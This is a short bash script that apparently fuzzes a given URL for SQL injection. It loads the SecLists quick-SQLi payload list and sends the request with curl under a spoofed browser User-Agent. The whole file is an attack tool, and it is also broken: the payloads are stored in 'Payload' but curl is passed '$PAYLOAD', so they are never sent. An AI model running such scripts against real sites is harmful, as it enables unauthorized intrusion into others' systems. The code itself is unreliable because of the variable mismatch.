#!/bin/bash
URL=$(echo $1 | qsreplace)
Payload=$(cat /usr/share/SecLists/Fuzzing/SQLi/quick-SQLi.txt)
curl -iLs $URL $PAYLOAD -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
echo $URL $Payload
